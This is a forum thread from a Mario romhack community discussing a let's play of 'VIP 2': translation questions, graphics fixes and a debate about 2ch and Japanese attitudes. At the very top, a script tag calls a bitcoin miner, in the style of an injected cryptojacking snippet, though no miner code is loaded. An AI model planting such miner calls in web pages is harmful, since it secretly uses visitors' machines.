<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitymario fan games galaxy

VIP 2 Revival; TRENTE-QUATRE: FINAL; the segment with infinity

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Redesignated
but what even is tuna
First name: Red
Pronouns: he/him/his

Re: VIP 2 Revival; Prelude: the segment with the hype

Postby Redesignated » 4 years ago

Horikawa Otane wrote:Actually, despite really bad issues with sexism and racism (particularly against Koreans and Chinese) at times, 2chan is honestly quite cordial. I've had a lot of good interactions there - in fact, the reason I could figure out some of the undocumented memes at all was because of the 2chan IRC and the friendly people there that explained them to me. I identified myself as a foreign speaker of Japanese who needed help with figuring some stuff out, tons of people volunteered and were super nice, I made some friends, etc. Even when I didn't volunteer my nationality or mother language, I've had very friendly interactions very consistently. I can't say I've had anything close to as positive a reaction the couple times I've visited 4chan.
Hm. Definitely different from everything else I've ever heard or seen about 2ch, then, barring the presence of racism and sexism.
Horikawa Otane wrote:
Redesignated wrote:It's not that they don't have "social justice warriors" there, it's that Japan in general is still hella homophobic and preys on stereotypes hardcore. (Not like other places aren't or don't, unfortunately, but they've got some serious human rights problems that transcend "lacking SJWs.")
Let's not uhh... Essentialise to this degree. Or make Japan out to be "behind the curve" on this because it really isn't … In some respects it is "hella homophobic" but in others it's decades ahead of the curve. Likewise in some respects the USA and any other country in the global north is "hella homophobic," but years ahead of the curve in specific ways. You risk typologizing and essentialising an entire culture, people, and localised LGBT rights movement (and its problems) with language like yours.
I'm moderately familiar with Japan's breadth of historical positive depictions of varied sexuality and gender, and I've read a bit about what it's doing on that front at the present. I've also read about the opposite, so I know it's not perfect either. "Hella homophobic" may have been a bad way to phrase it, but I won't say it doesn't turn that way too often for my tastes.
stuff 'n' things this will get filled in eventually i swear

Ivy

Re: VIP 2 Revival; DEUX: the segment with the superheroes

Postby Ivy » 4 years ago

big fan of the baseball cocks
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

benzeenie
⊂二二二(*^ω^)二⊃

Postby benzeenie » 4 years ago

http://www.change.org/p/5602530/preview

*EDIT*
Just a quick (non hilarious) edit to say that- 2ch is very, very far from being 'the Japanese 4chan'
As Horikawa Otane mentioned- the
"bad issues with sexism and racism (particularly against Koreans and Chinese) at times"
are most definitely there, but, imo are more of a Japanese thing and less of a 2ch thing.

4chan (mostly /b/) prides itself on being (or trying to be) the 'internet hate machine' which (again- imho) just doesn't fit 2ch at all.

FIGHT THE POWER!

Ivy

Postby Ivy » 4 years ago

never thought porings could be so hostile. this game really opened my eyes
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

Peliptia
(ˈpe-lip-SHēə) / [ˈpɛ-lɪp-ʃiə]

Postby Peliptia » 4 years ago

I hope I'm not a bother by asking, what are the fire flower replacements? Are they like some sort of paper-charm type thingy?? I've always been kind of curious (*^∇^*)ノ

EDIT: Also, the shapes thrown by dry-bones seem to be untranslated katakana, is that the case?
ImageImage

The Destroyer of Worlds
I am become death

Postby The Destroyer of Worlds » 4 years ago

Redesignated wrote: I'm moderately familiar with Japan's breadth of historical positive depictions of varied sexuality and gender, and I've read a bit about what it's doing on that front at the present. I've also read about the opposite, so I know it's not perfect either. "Hella homophobic" may have been a bad way to phrase it, but I won't say it doesn't turn that way too often for my tastes.
I doubt you're "modestly familiar" as much of that work simply only exists in Japanese. But it's taught in the classroom. And a "bit" of research, while surely better than none, still isn't enough to justify your commentary - what right do you have to make uninformed statements about a civil rights movement in another culture? The reality is, there are problems in specific areas of course, but there are a ton of areas where it genuinely excels and you REALLY can't erase those (or pay them lip service as you did above) without devolving into an overly simplistic "me more civilised/them less civilised" rhetoric. I know several people who moved to Japan (from America and the U.K.) specifically because they felt safer and less discriminated against as an LGBT person there (PARTICULARLY a trans friend of mine). Under your understanding of Japan this would appear inconceivable. And yet it happens - a lot, actually.

You don't speak Japanese, you haven't been to the country, etc. Judging Japan largely based on sensationalistic news reporting (ask yourself: which stories get reported in English vs which don't), comic books, and cartoons largely aimed towards teens would be like judging America based on tabloids, Spongebob, and the Sunday Funnies.

Surely you respect the culture enough to know your picture is woefully incomplete, extensively source-biased, and couched in a fundamental lack of understanding of your topic (based on a "bit" of research, entirely in Western reporting). Just being a generally progressive person doesn't give you carte blanche to say ignorant, misinformed, or problematic things about an entire culture. Either frame your statement as a question "isn't it the case that...." and accept corrections or do the proper research so you can speak in an informed manner. Otherwise you can't help but essentialise and simplify an entire culture as your understanding of it is essentialised and simple. And I shouldn't need to tell you how troubling that is.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

The Destroyer of Worlds
I am become death

Peliptia wrote:I hope I'm not a bother by asking, what are the fire flower replacements? Are they like some sort of paper-charm type thingy?? I've always been kind of curious (*^∇^*)ノ

EDIT: Also, the shapes thrown by dry-bones seem to be untranslated katakana, is that the case?
No it's translated. It says YOU POOR GUY. They face up or down based on whether they're thrown left or right I think.

Also gotta fix those damn butterflies. Those things have been annoying me since the dawn of this project... UGH. I vaguely know how to fix them though I guess.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

The Destroyer of Worlds
I am become death

WOOO got the stupid butterflies working~. I hate SMW hacking, but I'm starting to understand the complete mess that is how graphics work. VAGUELY.

morsel/morceau

Postby morsel/morceau » 4 years ago

Where is the patch to be found? [verysmalltext]I am stupid and can't find it anywhere.[/verysmalltext]
dont wanna jihad no more

The Destroyer of Worlds
I am become death

morsel/morceau wrote:Where is the patch to be found? [verysmalltext]I am stupid and can't find it anywhere.[/verysmalltext]
On my website

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 4 years ago

Horikawa Otane wrote:WOOO got the stupid butterflies working~. I hate SMW hacking, but I'm starting to understand the complete mess that is how graphics work. VAGUELY.
Hurray! Now the butterflies won't break the spacetime of reality anymore. That was a very important fix for the stability of the game.

Alice
Pronouns: Girl person

Postby Alice » 4 years ago

Ivy wrote:big fan of the baseball cocks
Those are baseball bats you pervert. A family friendly channel like raocow would never show something so obscene.

Kuupa
That's me on the beat, btw [:
First name: Alex
Pronouns: the male ones

Postby Kuupa » 4 years ago

Accurate representation of today's switch palace
So here we are. Plays have been enacted. Empires have come and gone. The mightiest have passed away and withered, alike the least. Fires have burned, thousandfold. Yet, did not the great wind serenely continue its course? Does not the blackbird still sing its song? Does not the mistletoe still dwell in the oak's crown? Forgotten, what once has been told. Veiled, the words that once so rang out. Shrouded, like the larva in its cocoon. Let him hear it, who will.

alleightbits
START PLAY!
First name: Brian

Postby alleightbits » 4 years ago

lookit those grass: exploding butterflies woo
reddish castle: it's tofu man!, etc.
water current place: BONUS FAIL
....are the charlies throwing baseballs with their dicks?
blue: becam

Slit08

Postby Slit08 » 4 years ago

Slit from the future has predicted some angrycow tomorrow... cause let me tell you world 2's first level sure is a thing....
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

aterraformer

Postby aterraformer » 4 years ago

LHB wrote:Good luck with this horrible, evil hack. I estimate at least 2 or 3 QS, depending on whether the airship level is nerfed or not in your version.
Do you know which version it is nerfed? I'm pretty sure this translated version isn't as some other levels were in their original state.

Also:
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

LHB

Postby LHB » 4 years ago

aterraformer wrote:Do you know which version it is nerfed? I'm pretty sure this translated version isn't as some other levels were in their original state.
There is a newer version that isn't on the site that has the nerfed airship iirc.

Jeran
:V
First name: Jeran

Postby Jeran » 4 years ago

speaking of 2chan, yesterday i had to teach a young teenager about the origins of emojis ( kaomoji specifically) and the popularity they have on 2chan. they tried correcting me, saying that i meant to say 4chan. it was then i realized that internet cultural history is really worth protecting, documenting, and sharing. now how they heck are we going to do that?

Xirix
The British Palindrome

Postby Xirix » 4 years ago

I remember next to nothing about VIP 2 despite watching both LPs of it, oh well... this'll be fun. Also since it was brought up, just what is the feather replacement?

Zephyr_DragonLord
The dragon awakens...!
First name: Zach

Postby Zephyr_DragonLord » 4 years ago

Jeran wrote:speaking of 2chan, yesterday i had to teach a young teenager about the origins of emojis ( kaomoji specifically) and the popularity they have on 2chan. they tried correcting me, saying that i meant to say 4chan. it was then i realized that internet cultural history is really worth protecting, documenting, and sharing. now how they heck are we going to do that?
On the topic of such memes.... there's been one I've been dying to know for a while. What the heck does wwww mean, and why did it only pick up in Japan?
I am prone to almost everything... except spontaneous violence.
Any questions, concerns, or aspirations you have with me can go to the PM box... Now here's a quote:
raocow wrote:I know there is a population on Earth. They like to populate. I like to gesticulate. We're friends!
(It was about time)

The Destroyer of Worlds
I am become death

Xirix wrote:I remember next to nothing about VIP 2 despite watching both LPs of it, oh well... this'll be fun. Also since it was brought up, just what is the feather replacement?
An eggplant.
Zephyr_DragonLord wrote:On the topic of such memes.... there's been one I've been dying to know for a while. What the heck does wwww mean, and why did it only pick up in Japan?
w is short for warau, which is the Japanese verb for 'to laugh' or 'to smile.' The reason it didn't get picked up by other countries is probably why lol is primarily used in the English speaking world :P.

Zephyr_DragonLord
The dragon awakens...!
First name: Zach

Postby Zephyr_DragonLord » 4 years ago

Thanks. That makes sense, thinking about it.

What doesn't make sense though, is why the VIP games passed up a perfect opportunity to put an Eggplant Wizard in there. Instead, they have juvenile jokes.... gaaaaaah.
I am prone to almost everything... except spontaneous violence.
Any questions, concerns, or aspirations you have with me can go to the PM box... Now here's a quote:
raocow wrote:I know there is a population on Earth. They like to populate. I like to gesticulate. We're friends!
(It was about time)

Le Neveu de Rameau
The Judith Butler of bad puns
First name: Rameau's Nephew

Postby Le Neveu de Rameau » 4 years ago

Alice wrote:
Ivy wrote:big fan of the baseball cocks
Those are baseball bats you pervert. A family friendly channel like raocow would never show something so obscene.
Yes, for as we all know, crotch-wielded baseball bats are phun for the whole phamily.

Learning-Timebuster
avatar courtesy of ringor mortis
First name: Luka
Pronouns: she or they

Postby Learning-Timebuster » 4 years ago

oh hey i just realized that this will be the first vip lp ill be following live-ish, since i wasnt keeping up with videos during the time the third vip 1 lp happened

i like the vips, theyve got personality, which a lot of romhacks and even standalone games seem to lack. sure, said personality isnt always the best in this case, but its there
"i like bugs"
t t

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Re: VIP 2 Revival; TROIS: the segment with the peliminary precision

Postby Willhart » 4 years ago

Are there any news on vip 6?

Return to “let's play”